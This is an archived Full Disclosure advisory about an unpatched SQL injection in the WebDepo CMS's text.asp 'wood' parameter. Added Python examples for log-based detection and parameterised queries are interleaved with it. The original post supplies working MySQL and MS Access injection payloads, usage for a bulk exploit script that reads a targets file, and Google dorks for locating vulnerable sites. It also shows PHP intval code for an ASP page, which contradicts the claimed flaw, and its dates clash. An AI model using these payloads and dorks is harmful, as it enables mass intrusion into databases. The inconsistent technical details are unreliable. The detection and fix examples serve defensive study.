
List:       full-disclosure
Subject:    [FD] (0DAY) WebDepo -SQL injection / INURL BRASIL
From:       INURL Brasil <inurlbr () gmail ! com>
Date:       2015-03-28 5:16:38
Message-ID: CANogS9jsAfdOabHtbZrMfesj+TbU1N=aZ-9C7o4Y6w=JUsbfJw () mail ! gmail ! com

Advisory: SQL injection vulnerabilities in the CMS WebDepo application
Affected web application: CMS WebDepo (Release date: 28/03/2014)
Vendor URL: http://www.webdepot.co.il
Vendor Status: 0day

==========================
Vulnerability Description:
==========================

The records and client practice management application
CMS WebDepo suffers from multiple SQL injection vulnerabilities.

==========================
Technical Details:
==========================
SQL can be injected through the following GET parameter:
GET VULN:     wood=(id)
$wood=intval($_REQUEST['wood'])

==========================
SQL injection vulnerabilities
==========================

Injection is possible through the file text.asp

Exploit-Example:

DBMS: 'MySQL'
Exploit:      +AND+(SELECT 8880 FROM(SELECT
COUNT(*),CONCAT(0x496e75726c42726173696c,0x3a3a,version(),(SELECT (CASE
WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

DBMS: 'Microsoft Access'
Exploit:
+UNION+ALL+SELECT+NULL,NULL,NULL,CHR(113)&CHR(112)&CHR(120)&CHR(112)&CHR(113)&CHR(85)&CHR(116)& \
CHR(106)&CHR(110)&CHR(108)&CHR(90)&CHR(74)&CHR(113)&CHR(88)&CHR(116)&CHR(113)&CHR(118)&CHR(111)& \
CHR(100)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
FROM MSysAccessObjects%16

Ex: http://target.us/text.asp?wood=(id)+Exploit
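For operators of a WebDepo install, the request shape above is easy to spot in web server logs: the application expects `wood` to be a plain numeric id, so any non-digit value, and in particular one carrying SQL keywords such as UNION, SELECT, INFORMATION_SCHEMA or MSysAccessObjects, is an exploitation attempt. The following detector is an added example (not code from the advisory or from the WebDepo vendor); the log lines it scans are constructed samples in Apache combined format, with placeholder IPs, and the hypothetical `classify_request` and `scan_log` functions are mine.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access-log lines (Apache "combined" style); not real traffic.
# Line 2 and 3 carry shortened forms of the two payload families shown in the advisory.
SAMPLE_LOG = """\
203.0.113.5 - - [28/Mar/2015:05:16:38 +0000] "GET /text.asp?wood=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [28/Mar/2015:05:16:40 +0000] "GET /text.asp?wood=12+AND+(SELECT+8880+FROM+INFORMATION_SCHEMA.CHARACTER_SETS) HTTP/1.1" 500 612 "-" "Mozilla/5.0"
198.51.100.7 - - [28/Mar/2015:05:17:01 +0000] "GET /text.asp?wood=7%20UNION%20ALL%20SELECT%20NULL%2CCHR(113)%20FROM%20MSysAccessObjects HTTP/1.1" 200 5120 "-" "curl/7.40"
198.51.100.9 - - [28/Mar/2015:05:17:05 +0000] "GET /about.asp HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# ip, timestamp, method, request target and status code of a combined-format line
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Keywords and functions used by the MySQL and MS Access payloads in the advisory.
SQL_MARKERS = re.compile(
    r'\b(UNION|SELECT|FROM|INFORMATION_SCHEMA|MSysAccessObjects)\b|CHR\s*\(|CONCAT\s*\(',
    re.IGNORECASE,
)


def classify_request(target):
    """Return (is_suspicious, reason) for one request target such as '/text.asp?wood=12'."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("text.asp"):
        return (False, "other page")
    # The Access payload uses '&' as its string-concatenation operator, which would cut
    # the value at the first '&'; the leading UNION/SELECT still matches, and any value
    # that is not purely digits is flagged regardless.
    m = re.search(r'(?:^|&)wood=([^&]*)', parts.query)
    if not m:
        return (False, "no wood parameter")
    value = unquote_plus(m.group(1))          # '+' and %xx decoded like the server would
    if value.isdigit():
        return (False, "numeric id")
    hit = SQL_MARKERS.search(value)
    if hit:
        return (True, "sql keyword %s in wood" % hit.group(0))
    return (True, "non-numeric wood value")


def scan_log(text):
    """Return [(ip, status, reason)] for every suspicious text.asp request in the log text."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        suspicious, reason = classify_request(m.group("target"))
        if suspicious:
            findings.append((m.group("ip"), m.group("status"), reason))
    return findings


if __name__ == "__main__":
    for ip, status, reason in scan_log(SAMPLE_LOG):
        print("%s -> %s (%s)" % (ip, status, reason))
```

Flagging on "not a digit string" rather than on a keyword list is the robust rule here; the keyword match only adds a human-readable reason. A 500 status next to a flagged value, as in the second sample line, is a strong sign the injected SQL actually reached the database.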

==========================
SCRIPT EXPLOIT
==========================

http://pastebin.com/b6bWuw7k
--help:
    -t : SET TARGET.
    -f : SET FILE TARGETS.
    -p : SET PROXY
    Execute:
    php WebDepoxpl.php -t target
    php WebDepoxpl.php -f targets.txt
    php WebDepoxpl.php -t target -p 'http://localhost:9090'

howto: http://blog.inurl.com.br/2015/03/0day-webdepo-sql-injection.html

==========================
GOOGLE DORK
==========================

inurl:"text.asp?wood="
site:il inurl:"text.asp?wood="
site:com inurl:"text.asp?wood="

==========================
Solution:
==========================

Validate and sanitize all input coming from the client before it reaches a query.
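To make the fix concrete, here is the vulnerable lookup pattern beside a hardened one. This is an added example written for this page, not WebDepo's code (the real page is classic ASP and the vendor's query is not shown here); it uses an in-memory SQLite table with constructed rows, and the function names `lookup_vulnerable`, `parse_id` and `lookup_safe` are mine. The hardened version does two things: it whitelists the `wood` value as ASCII digits (stricter than an integer cast, which would silently truncate `12 AND ...` to 12) and then binds the value as a query parameter so it can never alter the SQL statement's structure.

```python
import re
import sqlite3


def make_demo_db():
    """In-memory stand-in for the CMS content table (constructed data, not WebDepo's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE texts (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO texts VALUES (?, ?, ?)", [
        (1, "Welcome", "public page"),
        (2, "Pricing", "public page"),
        (3, "Internal notes", "never meant to be listed through the id lookup"),
    ])
    return conn


def lookup_vulnerable(conn, wood):
    """The flawed pattern: the raw request parameter is concatenated into the SQL text."""
    sql = "SELECT id, title FROM texts WHERE id=" + wood
    return conn.execute(sql).fetchall()


def parse_id(value):
    """Whitelist validation: the page expects a numeric id, so accept ASCII digits only.

    str.isdigit() alone would also accept Unicode digits such as superscripts, which
    int() then rejects, so a fullmatch on [0-9]+ is used instead.
    """
    if not isinstance(value, str) or not re.fullmatch(r"[0-9]+", value):
        raise ValueError("wood must be a positive integer id")
    return int(value)


def lookup_safe(conn, wood):
    """Validate first, then bind the value as a parameter instead of splicing it into SQL."""
    wood_id = parse_id(wood)
    return conn.execute("SELECT id, title FROM texts WHERE id=?", (wood_id,)).fetchall()


if __name__ == "__main__":
    conn = make_demo_db()
    # A textbook tautology is enough to show the difference between the two lookups.
    print("vulnerable:", lookup_vulnerable(conn, "1 OR 1=1"))   # every row comes back
    print("safe:      ", lookup_safe(conn, "1"))                # exactly one row
    try:
        lookup_safe(conn, "1 OR 1=1")
    except ValueError as exc:
        print("safe rejected input:", exc)
```

Rejecting the request outright, as `parse_id` does, is preferable to casting: a cast hides the attempt, while a rejection can be logged and correlated with the log-based detection of the same parameter.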

==========================
Credits:
==========================

AUTHOR:         Cleiton Pinheiro / Nick: googleINURL
Blog:           http://blog.inurl.com.br
Twitter:        https://twitter.com/googleinurl
Fanpage:        https://fb.com/InurlBrasil
Pastebin:       http://pastebin.com/u/Googleinurl
GIT:            https://github.com/googleinurl
PSS:            http://packetstormsecurity.com/user/googleinurl
YOUTUBE:        http://youtube.com/c/INURLBrasil
PLUS:           http://google.com/+INURLBrasil

==========================
References:
==========================

[1] http://blog.inurl.com.br/2015/03/0day-webdepo-sql-injection.html
[2] https://msdn.microsoft.com/en-us/library/ff648339.aspx

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/